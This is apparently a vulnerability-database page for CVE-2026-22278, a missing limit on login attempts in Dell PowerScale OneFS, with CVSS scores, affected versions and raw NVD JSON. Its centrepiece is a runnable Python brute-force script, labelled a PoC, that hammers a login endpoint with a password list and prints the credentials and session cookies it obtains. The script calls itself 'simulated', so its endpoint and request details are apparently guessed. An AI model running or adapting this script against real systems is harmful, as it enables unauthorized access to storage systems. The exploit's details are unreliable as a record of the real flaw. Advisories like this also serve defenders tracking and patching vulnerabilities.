Security Vulnerability Report
中文
CVE-2026-22278 CVSS 8.1 HIGH

CVE-2026-22278

Published: 2026-01-22 17:16:31
Last Modified: 2026-01-28 18:18:34
Source: [email protected]

Description

Dell PowerScale OneFS versions prior to 9.13.0.0 contains an improper restriction of excessive authentication attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:powerscale_onefs:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerScale OneFS < 9.13.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-22278 PoC - Dell PowerScale OneFS Authentication Bypass Note: This is a simulated PoC for educational and security research purposes only. """ import requests import sys from concurrent.futures import ThreadPoolExecutor, as_completed TARGET_HOST = "https://target-ip:8080" USERNAME = "admin" PASSWORD_FILE = "passwords.txt" MAX_THREADS = 10 MAX_ATTEMPTS = 1000 def attempt_login(host, username, password): """Attempt to authenticate with the given credentials""" session = requests.Session() login_url = f"{host}/api/auth/login" payload = { "username": username, "password": password } try: response = session.post(login_url, json=payload, timeout=10, verify=False) if response.status_code == 200 and "session" in response.text: return True, password, response.cookies.get_dict() return False, password, None except requests.exceptions.RequestException: return False, password, None def main(): print(f"[*] CVE-2026-22278 PoC - Dell PowerScale OneFS Authentication Bypass") print(f"[*] Target: {TARGET_HOST}") print(f"[*] Username: {USERNAME}") try: with open(PASSWORD_FILE, 'r') as f: passwords = [line.strip() for line in f.readlines()] except FileNotFoundError: passwords = ['password', 'admin', '123456', 'P@ssw0rd', 'Admin@123'] print(f"[*] Starting brute force attack with {len(passwords)} passwords...") attempts = 0 with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: futures = {executor.submit(attempt_login, TARGET_HOST, USERNAME, pwd): pwd for pwd in passwords[:MAX_ATTEMPTS]} for future in as_completed(futures): attempts += 1 success, pwd, cookies = future.result() if success: print(f"\n[!] SUCCESS! Valid credentials found: {USERNAME}:{pwd}") print(f"[!] Session cookies: {cookies}") return 0 if attempts % 100 == 0: print(f"[*] Attempts: {attempts}/{MAX_ATTEMPTS}") print(f"\n[-] No valid credentials found after {attempts} attempts") return 1 if __name__ == "__main__": sys.exit(main())

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22278", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:31.027", "lastModified": "2026-01-28T18:18:33.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerScale OneFS versions prior to 9.13.0.0 contains an improper restriction of excessive authentication attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access."}, {"lang": "es", "value": "Las versiones de Dell PowerScale OneFS anteriores a la 9.13.0.0 contienen una vulnerabilidad de restricción inadecuada de intentos excesivos de autenticación. Un atacante no autenticado con acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que llevaría a un acceso no autorizado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:powerscale_onefs:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.13.0.0", "matchCriteriaId": "D004A551-1E20-4170-A949-143E488FA9C9"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.